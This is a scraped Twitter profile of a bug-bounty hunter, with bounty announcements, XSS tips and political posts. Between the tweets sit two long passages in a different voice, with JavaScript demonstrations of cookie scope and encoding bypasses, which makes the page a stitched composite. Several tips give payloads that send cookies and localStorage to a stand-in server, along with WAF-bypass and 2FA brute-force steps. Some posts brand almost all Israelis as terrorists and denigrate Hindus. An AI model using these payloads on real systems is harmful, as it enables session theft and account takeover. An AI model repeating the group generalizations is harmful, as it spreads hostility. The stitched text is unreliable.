Sourav Khan🇧🇩 🇵🇸

@Br0k3n_1337

Followers: 2,312
Following: 970
Media: 95
Statuses: 696

Bug Bounty Hunter | Muslim❤️

Bangladesh
Joined October 2020
Pinned Tweet
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
All Praise is Due to Allah Alone❤ I earned $10,247 for my 3 submissions on @Hacker0x01 Note: There is an old report that was initially rewarded with $700, but later they upgraded the severity and rewarded an additional $1,879. I didn't include those $700 in this post.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
All praise is due to Allah alone❤ I earned $1,316 for my submission on @Hacker0x01 Bug: XSS to information disclosure. I used the double URL-encoded version of this payload: <img src="x" onerror="fetch('http://yourserver/?cookie=' + encodeURIComponent(document.cookie));">
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah❣️ I earned $1,690 for my 13 submissions on @Bugcrowd #ItTakesACrowd #bugcrowd #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
8 months
Alhamdulillah & Allahu Akbar❤️ I earned $2,895 for my submission on @Hacker0x01 It was an interesting finding. Maybe I will share a post about it after it gets fixed.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
8 months
In the name of Allah, the Most Gracious, the Most Merciful❤️ Here is a unique bug bounty tip for XSS to account takeover: Suppose you have found an XSS at www.redacted.com, but all of its authentication cookies have the "HttpOnly" flag set, so you are unable to steal those cookies.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
Alhamdulillah❤ I earned $1,220 for my submission on @Bugcrowd Bug Bounty Tips: When testing a target, forget the fact that others have also tested it. Assume it is new, and check for all vulnerabilities from P4 to P1. #bugbounty #bugcrowd #ItTakesACrowd #bugbountytip
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
All praise is due to Allah alone❤ I earned $3,080 for my submission on @Hacker0x01 Bug: Stored XSS leads to permanent account takeover. (I mean it) Check subpost for tips #bugbounty #xss #bugbountytip #bugbountytips #payload #hackerone #xsspayload #BugBounty #xsspayloads
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah❤ MongoDB rewarded me with a Bonus of $1,200 on @Hacker0x01 and at present my Rank is #1 on their Leaderboard. #Bugbounty #hackerone #TogetherWeHitHarder
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
All praise is due to Allah alone❤ I earned $125 for another submission on @Bugcrowd #ItTakesACrowd #bugcrowd #BugBounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
All praise is due to Allah alone❤ I earned $660 for my 3 submissions on @Bugcrowd #ItTakesACrowd #bugcrowd #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah😊 I earned $500 for my 5 submissions on @Hacker0x01 #TogetherWeHitHarder #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
All praise is due to Allah alone❤ I earned $2,947 for my submission on @Hacker0x01 . Bug: Reflected XSS leads to permanent account takeover. #bugbounty #xss #bugbountytip #bugbountytips #payload #hackerone #xsspayload #BugBounty #xsspayloads #TogetherWeHitHarder
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
All Praise Be to Allah❤ @Bugcrowd Rewarded me with a Bounty of $350. Bug: WAF Bypass >> XSS #bugcrowd #ItTakesACrowd #bugbounty #xss
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
All praise is due to Allah alone❤ I earned $450 for my 3 submissions on @Bugcrowd #ItTakesACrowd #bugcrowd #BugBounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
Alhamdulillah❤ I earned $1,040 for my submission on @Hacker0x01 Bug: Stored XSS on the mobile version of the website leads to a permanent account takeover. Check subpost for tips #bugbounty #xss #bugbountytip #bugbountytips #hackerone #BugBounty #togetherwehitharder
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
Alhamdulillah❤ I earned $150 for my submission on @Hacker0x01 Bug: Information Disclosure Here are some tips: 1. Enumerate all the subdomains of the target 2. Get a list of configuration files. 3. Fuzz with ffuf or other tools. #bugbounty #bugbountytips #bugbountytip
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah❣️ I earned $300 for another submission on @Bugcrowd #ItTakesACrowd #bugcrowd #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
Alhamdulillah❣ I earned $200 for my 2 submissions on @Hacker0x01 #TogetherWeHitHarder #bugbounty #hackerone
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
We Bangladeshi Muslims support the freedom fighters of Palestine. Palestine must get back its freedom, rights, and land. #GoAheadPalestine
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
All praise is due to Allah alone❤ I earned $100 for another submission on @Hacker0x01 #TogetherWeHitHarder #bugbounty #hackerone
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
[Thread] If you can't focus on a single program because it's huge, then instead of testing the whole target you can follow these rules: 1. Enumerate all the subdomains 2. Run the httpx tool on different ports of those subdomains
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
Alhamdulillah❤ I earned $700 for my submission on @Hacker0x01 Bug: 0-Click Account Takeover. I still disagree with the severity set by the triager. #bugbounty #hackerone #BugBounty #TogetherWeHitHarder
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
Alhamdulillah😊 A program rewarded me with a $733 bonus for becoming the District Champion of their campaign at @Hacker0x01 #BugBounty #hackerone
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Sometimes this chart will help you bypass a firewall and encoding: I have bypassed a well-known firewall using this. Ex: The firewall prevented me from closing any HTML tag. I just used: �</a> And boom, the firewall was bypassed and a tag was closed.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah😊 Today I earned $200 for my 2 submissions on @Hacker0x01 #TogetherWeHitHarder #bugbounty #hackerone
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
Alhamdulillah☺ For the first time ranking #1 on the @Hacker0x01 leaderboard of Bangladesh and Ranking #10 internationally based on "Highest Reputation" #hackerone #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
Alhamdulillah❤️ I earned $350 for my submission on @bugcrowd Tips: Immediately Retest your report after it gets resolved. #ItTakesACrowd #bugbountytip #bugbountytips #bugbounty #xss
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
I have used the polyglot XSS payload of @brutelogic : JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</code/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//0.rip/m\76-->
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Here is how I have found 3 Reflected XSS Easily Just using a Simple Technique: [Thread] >> Found XSS at
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
All Praise Be to Allah❤ @Bugcrowd Rewarded me with a Bounty of $125 #ItTakesACrowd #bugcrowd #BugBounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah😊 I earned $130 for my submission on @Bugcrowd #bugcrowd #ItTakesACrowd #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
3 years
Alhamdulillah. @Bugcrowd rewarded me with a bounty of $150 #bugbounty #bugcrowd
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah❣️ I earned $150 for my submission on @Bugcrowd #ItTakesACrowd #bugcrowd #BugBounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah😊 I earned $200 for my submission on @Bugcrowd #bugbounty #Bugcrowd #ItTakesACrowd
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
This is How I choose a Bug Bounty Program: 1. Wide scope 2. Fast response time 3. The Program that pays a fair amount of Bounty. 4. The program that got fewer submissions from hunters. 5. Fewer rules. 6. New on the Platform #bugbounty #bugbountytips
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah😊 I earned $200 for my another submission on @Bugcrowd #bugcrowd #ItTakesACrowd #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
Alhamdulillah❤ I earned $110 for my vulnerability report to a Self Hosted Bug Bounty Program. Bug: post based xss #bugbounty #xss
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
Bug Bounty Tips: Here is an XSS payload that steals both cookies and local storage data: <svg/onload='const url = `https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}`; fetch(url);'>"
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Really Cool Stickers. Thanks @PentesterLab .
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
Me too. AllahuAkbar☝️
@rana__khalil
Rana Khalil 🇵🇸
10 months
If you support Israel, do both of us a favour and consider unfollowing / blocking me.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah❤ Small Bounty from Retest of My Own Report of @Hacker0x01 #hackerone #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
@burhanvejalpur @bxmbn @fattselimi @NinadMishra5 I believe performing wudu 5 times a day will keep your eyes and body refreshed. And performing Salah 5 times a day at the mosque will keep your body healthy. Whenever you feel exhausted perform wudu and nafl Salah. You will feel better InShaAllah. Also, do basic exercise everyday
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
@0xNaeem Just an example: httpx -l allsub.txt -silent -timeout 20 -p 8443,443,3306,1-5 -o resolved.txt It will look on ports 8443,443,3306 and ports 1 to 5
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
@ReebootToInit5 @IDF My country is not limited to a specific area. Every Muslim country is my country. We will rebuild the Muslim empire soon In-Sha-Allah. We ruled over you, and we will rule again to establish peace and destroy your hatred. And we are not broken. We are strong and becoming stronger.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
Hi @jobertabma I hope you are doing well. Recently, I reported an XSS vulnerability to a private BBP, and they awarded the submission and resolved the issue. Then, I found a bypass and reported the XSS vulnerability again. A triager duplicated the submission as a case from 2022
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
8 months
3. If the victim logs in to test.example.com and clicks on your malicious link, which is any.example.com/?=payload 4. Then his cookie for test.example.com will be sent to your server 5. The report title should be "XSS on any.example.com leads to account takeover at test.example.com"
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
Bug Bounty Tip: The more time you invest in understanding a website, the better results you will achieve. For example, I have been hunting on the same program for the past 3 months. #bugbountytip #bugbountytips #BugBounty #xss #hackerone
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
Bug Bounty Tips: When looking for stored XSS, consider using a polyglot payload instead of normal one. Record a video POC showing max impact. Failing to do so might lead to a lower severity rating. And feel free to express your opinion if you disagree with the assigned severity
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
Extremist Indian Hindus🤬
@AminaaKausar
أمينة Amina
11 months
Muslim Girl Repeatedly R @ped For Two Years In School. A minor Muslim student was repeatedly raped for two years in a school in Bihar by a Hindu man named Samrat Vishwas,who is the son of school's director. The traumatised Muslim girl says Vishwash regularly used to lock her in
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
Bug Bounty Tips: If your payload didn't work on the desktop version of the website, then try to visit the same endpoint from your mobile. The mobile version of the website could be vulnerable.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
2. If you have found an XSS, then don't just pop up an alert and report it. Show proper impact: hijack the victim's session, steal local storage data, or try to escalate the severity by chaining it with other bugs. #bugbounty #xss #bugbountytip #bugbountytips #payload #hackerone
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
If your report gets resolved, then try to reproduce it again from both desktop and mobile. Sometimes the mobile version of the website could still be vulnerable.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
Steps: 1. Enumerated the user's email via a misconfigured signup form 2. Bypassed the rate limit mechanism of the password field and obtained the password 3. Acquired the 2FA code through brute-forcing. 4. Performed additional technical tasks. 5. Finally, logged into the account.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
XSS Tips: 1. If the application encodes your input properly, then still execute 2 versions of your polyglot payload: the single URL-encoded version and the double URL-encoded version. Depending on how the application handles user input, your payload may still be executed.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
All Praise is Due To Allah❤ Just Started this new month by receiving a Bounty of $200 from @Bugcrowd Tips: Sometimes changing the language of the website may introduce a new bug. Check sub-tweet for example. #bugcrowd #ItTakesACrowd #bugbountytips #bugbounty
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
9 months
Watch this before blindly supporting Israel.
@propandco
Prop. co
9 months
𝗗𝗼 𝘆𝗼𝘂 𝗰𝗼𝗻𝗱𝗲𝗺𝗻 𝗮𝗿𝗺𝗲𝗱 𝗣𝗮𝗹𝗲𝘀𝘁𝗶𝗻𝗶𝗮𝗻 𝗿𝗲𝘀𝗶𝘀𝘁𝗮𝗻𝗰𝗲?
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
@SirBagoza @Hacker0x01 Yes, you are right. Sharing the bounty amount could be a bad idea. But I think Allah is sufficient to protect me from evil eyes. I will think about it. Thanks for your advice.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
USA helping Israel to kill children.
@muslimdaily_
muslim daily
10 months
Israeli settler terrorists torched a young Palestinian boy near Hebron. His crime is being Palestinian.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
8 months
Example: 1. Suppose you have found XSS on any.example.com, but all of its cookies have HttpOnly set 2. You have discovered another subdomain, named test.example.com. Its cookie is wildcard-set, and there is no HttpOnly flag.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
@3ncryptSaan @ReebootToInit5 @errorsec_ It is his matter that he supports Israel. And this is my matter that I support Palestine. That is not related to bug bounty. It is not prohibited in Islam to trade with non-Muslims. So, I will continue to hunt on Hackerone.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
8 months
But there is still a way to escalate this to account takeover. Here is how: 1. Enumerate all the subdomains of the target 2. Look for a user login form or signup form. 3. If you find any, then log in to them with your test account 4. Open your browser dev tools and check the cookies
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
A Fantastic Thread Of IDOR🔥 #idor #bugbountytip
@0xblackbird
0xblackbird
2 years
Mega-thread on IDORs
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
Almost all the citizens of Israel are extremists and terrorists.
@muslimdaily_
muslim daily
1 year
We might be able to upload 2 hours of video now, but all you need is 1 minute to understand that Israel is a terrorist state occupying the land of Palestine. Today was the day of the Israeli flag march through occupied East Jerusalem. This is what it usually looks like.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
@arth_bajpai What is toxic here? We Muslims can't live together...? Do you want to say that?
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
6. If you are unable to find any bugs on that subdomain then switch to the next subdomain or target. And don't forget to take a little break before moving to the next target. #bugbounty #bugbountytips #bugbountytip #recon
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
List of bug bounty writeups #bugbountytips #bugbounty #POC
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
@NahamSec What advice would you give yourself?
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
Alhamdulillah. I have Found a Security Vulnerability at @RealTryHackMe and they have Rewarded Me with 2 Month #tryhackme Subscription. Thanks, @RealTryHackMe for the Reward and Polite Behavior. #bugbounty #swag
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
9 months
Indian Hindus who wanna show their Support to Israel should use this opportunity😁
@MarioNawfal
Mario Nawfal
9 months
🚨 Israel Seeks to Bring In 50,000-100,000 Indian Workers for Jobs Formerly Held by Palestinians
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
>> Tried to find XSS at another subdomain at the same endpoint, and it worked. >> Tried to find XSS at another TLD at the same endpoint, and it worked #xss #bugbounty #bugbountytip @theXSSrat
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
@ReebootToInit5 @IDF We dreamed it before, became successful, and built the Ottoman Empire. Ruled over Europe and Asia. Even in Varat. We dream that again and We will be successful again. In-Sha-Allah
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
@Bugcrowd '"><script>confirm()</script> >> <script> tag removed by WAF Now URL encode the whole payload to bypass this WAF. Example: html?param=%27%22%3e%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%29%3c%2f%73%63%72%69%70%74%3e%20
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
9 months
Israeli Army are Inhuman and terrorist😡
@MiddleEastEye
Middle East Eye
9 months
🔴UPDATE: #Israel #Palestine The Israeli army arrested pregnant Palestinian journalist Somaya Jawabra and her husband Tariq Yousef. Jawabra is 7 months pregnant and the mother of 3 young children More here ⤵️
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
3 years
Yo..! Just got 6 Months @RealTryHackMe Voucher by completing a simple CTF Challenge Hosted by @ErrantPacket . The flag was hidden on the TXT record of the Domain. Simple dig command revealed that flag. Command: dig (domainname).com txt Flag: EPXMAS{zfC8vX}
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
5. Hunt on that subdomain. Apply all the methods you know, like enumerating endpoints through Burp, Shodan, GitHub, gauplus, hakrawler, AlienVault and applying different hacking techniques on them. Play with responses.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
8 months
5. Check whether any of the subdomains' cookies are set without the "HttpOnly" flag. It also has to be a wildcard cookie (.example.com) 6. If the authentication cookie is set as a wildcard and without the "HttpOnly" flag, then you can steal it from the domain where you have found the XSS
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
3. Visit all those resolved subdomains you got from httpx (you can use this Chrome extension to open multiple URLs at once: 4. Now select a subdomain that seems different, interesting, vulnerable, or not tested by others.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
8 months
@kingcoolvikas There are 2 conditions required: 1. The cookie should not have the HttpOnly flag set 2. The cookie should be wildcard-set (example: *.redacted.com)
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
8 months
@kingcoolvikas 1. Open Chrome dev tools and go to the "Application" tab 2. Click on "Cookies". You will see a section there called "Domain". Explanation: .github.com (it means the cookie is accessible from all the subdomains) github.com (it means the cookie is only valid for github.com)
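The check behind this thread (which cookie, set by which subdomain, a script injected on a sibling host under the same parent domain can actually read), as an added example that is not the author's code: it parses a few Set-Cookie headers and reports those that are both scoped to the parent domain (the "wildcard" / ".example.com" cookie above) and missing HttpOnly. The hosts, cookie names and header values are constructed for illustration, not captured from any real program.

```javascript
// Added example (not code from the original posts). Given the Set-Cookie
// headers seen on a few subdomains, list the cookies that a script running on
// xssHost could read via document.cookie: a cookie whose Domain attribute is
// the parent domain (the "wildcard" / ".example.com" cookie in the thread)
// and which lacks HttpOnly. Hosts and header values below are constructed.

const SAMPLE_HEADERS = [
  // [host that sent the header, raw Set-Cookie value]
  ['www.example.com',  'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax'],
  ['test.example.com', 'auth=xyz789; Domain=.example.com; Path=/; Secure'],
  ['test.example.com', 'csrf=tok; Domain=example.com; Path=/; Secure; HttpOnly'],
  ['api.example.com',  'pref=dark; Path=/'],
];

// Minimal Set-Cookie parser: name=value, then the attributes we care about.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    domain: null,      // null = host-only cookie (no Domain attribute)
    httpOnly: false,
    secure: false,
  };
  for (const attr of attrs) {
    const [k, v = ''] = attr.split('=');
    const key = k.trim().toLowerCase();
    // RFC 6265: a leading dot in the Domain attribute is ignored
    if (key === 'domain') cookie.domain = v.trim().toLowerCase().replace(/^\./, '');
    else if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
  }
  return cookie;
}

// Can document.cookie on scriptHost see this cookie?
// - HttpOnly cookies are never exposed to script.
// - A host-only cookie is visible only on the exact host that set it.
// - A Domain cookie is visible on that domain and every host under it.
// (Secure cookies additionally need an https origin; assumed here.)
function readableFrom(cookie, setByHost, scriptHost) {
  if (cookie.httpOnly) return false;
  if (cookie.domain === null) return scriptHost === setByHost;
  return scriptHost === cookie.domain || scriptHost.endsWith('.' + cookie.domain);
}

// Report the cookies an XSS on xssHost could exfiltrate, in header order.
function findStealable(samples, xssHost) {
  return samples
    .map(([host, header]) => ({ host, cookie: parseSetCookie(header) }))
    .filter(({ host, cookie }) => readableFrom(cookie, host, xssHost))
    .map(({ host, cookie }) =>
      `${cookie.name} (set by ${host}, Domain=${cookie.domain ?? 'host-only'})`);
}

// XSS on a sibling subdomain: only the wildcard, non-HttpOnly cookie leaks.
console.log(findStealable(SAMPLE_HEADERS, 'any.example.com'));
// XSS on api.example.com itself: its own host-only cookie leaks too.
console.log(findStealable(SAMPLE_HEADERS, 'api.example.com'));
```

Run it with any recent Node. The first call returns only the `auth` cookie from test.example.com, which is exactly the case the thread describes; the `session` cookie from www is invisible because of HttpOnly even though it is the one you would most like to have. Note that `readableFrom` answers only the document.cookie question; whether the stolen value is actually a session for the target app is what the report still has to demonstrate.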
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
7 months
@Jayesh25_ If all the above methods are not working then here is another way to perform account takeover:
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
The program is very old, but the home page of its website was still vulnerable to XSS. Why had no one reported it before? Well, the reason could be that the website encoded its input properly. That's why they left it without trying the double URL-encoded version of their payload.
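The mechanism behind the single- and double-URL-encoded payloads in these posts (URL-encoding the whole payload to get past a WAF that strips script tags, the double-encoded version that still executes on a site that "encodes properly", and the tip to always try both versions), as an added example that is not the author's or any vendor's code. The edge filter, application and client-side script below are hypothetical stand-ins, not a specific product; the point is that each extra encoding layer defeats one more inspection layer that decodes once, and only a sink that never decodes again (textContent-style) is inert.

```javascript
// Added example (not code from the original posts). Models three inspection
// layers and shows which URL-encoding depth slips past each one. Every
// component here is a hypothetical stand-in, not a specific WAF or framework.

const PAYLOAD = `'"><script>confirm()</script>`;   // the tweet's reflected-XSS probe

const encodeOnce = s => encodeURIComponent(s);
const encodeTwice = s => encodeURIComponent(encodeURIComponent(s));

// Layer 1: an edge filter that pattern-matches the raw query string without
// URL-decoding it. A single encoding pass already hides "<script" from it.
function edgeFilterBlocks(rawQuery) {
  return /<script/i.test(rawQuery);
}

// Layer 2: the application. Like most frameworks it URL-decodes the parameter
// once, then runs its own block list on the decoded value and HTML-escapes
// what it reflects into the page.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}
function appRender(rawQuery) {
  const decoded = decodeURIComponent(rawQuery);
  if (/<script/i.test(decoded)) return { blocked: true, html: null };
  return { blocked: false, html: `<div id="q" data-q="${htmlEscape(decoded)}"></div>` };
}

// Layer 3: client-side code that reads the reflected value back out of the
// attribute. The attribute itself is safe (it was HTML-escaped); what matters
// is what the script does with the value next.
function htmlUnescape(s) {
  const map = { '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'" };
  return s.replace(/&(?:amp|lt|gt|quot|#39);/g, m => map[m]);
}
function attributeValue(html) {
  const m = /data-q="([^"]*)"/.exec(html);
  return m ? htmlUnescape(m[1]) : '';
}
// Vulnerable sink: URL-decodes AGAIN and writes to innerHTML. That second
// decode is what turns a double-encoded payload back into live markup.
function vulnerableSink(html) {
  return { value: decodeURIComponent(attributeValue(html)), parsedAsHtml: true };
}
// Hardened sink: no extra decode, written with textContent (never parsed).
function hardenedSink(html) {
  return { value: attributeValue(html), parsedAsHtml: false };
}

// Follow one raw query string through all three layers.
function trace(rawQuery, sink = vulnerableSink) {
  if (edgeFilterBlocks(rawQuery)) return 'blocked-at-edge';
  const { blocked, html } = appRender(rawQuery);
  if (blocked) return 'blocked-by-app';
  const reaching = sink(html);
  return reaching.parsedAsHtml && /<script/i.test(reaching.value) ? 'executes' : 'inert';
}

const cases = [['plain', PAYLOAD], ['encoded once', encodeOnce(PAYLOAD)], ['encoded twice', encodeTwice(PAYLOAD)]];
for (const [label, q] of cases) {
  console.log(label.padEnd(14), trace(q).padEnd(16), '| hardened sink:', trace(q, hardenedSink));
}
```

Plain input dies at the edge, the once-encoded version gets past the edge but is caught by the application's own check on the decoded value, and only the twice-encoded version reaches the page, where the client-side decode hands `<script>` to innerHTML. Swap in `hardenedSink` and the same input is inert, which is the fix: filter on the fully decoded value, and never decode again at the sink.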
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
1 year
@Aavez11 @z3r01k @Hacker0x01 Check the link below. Combine some of the wordlists from there and make your own wordlist.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
I believe this is not a duplicate at all. I reported the vulnerability immediately after it was resolved. Could you please take a look at it?
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
@Bugcrowd Here it is:
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
@errorsec_ What about those who are just normal people of Palestine: little children, women, aged people who were killed by Israeli forces? I saw several videos where Israeli forces kicked out old men, shot innocent people, and bombed civilians.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
11 months
@Steiner254 @Hacker0x01 Ha ha. I have described to them how an account takeover is possible in another report, so in this report, I have shown that XSS exists. '"--></title></script><svg/onload=alert('anything')>
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
@errorsec_ You are supporting your friend Israel. You never supported Humanity. If you want to support humanity then speak for free Kashmir, free Palestine.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
2 years
And don't forget to Fuzz with Private and Public wordlists to Reveal Sensitive Directories and Hidden Parameters. In this case, You can use Arjun Tool to find Hidden parameters and the ffuf tool to find sensitive directories or files.
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
@3ncryptSaan @rounak131106 @ReebootToInit5 @errorsec_ Yes, news only shows 1%, 99% stay undisclosed. You would not believe how many Hindus from India and Bangladesh messaged me to get help to start bug bounty and other stuff. I tried to help them all. But when someone speaks ill about people from my religion, I will not tolerate it
@Br0k3n_1337
Sourav Khan🇧🇩 🇵🇸
10 months
@errorsec_ You can't show me a single video where an Israeli girl was raped by a Hamas soldier. That is not in our culture. AllahuAkbar☝️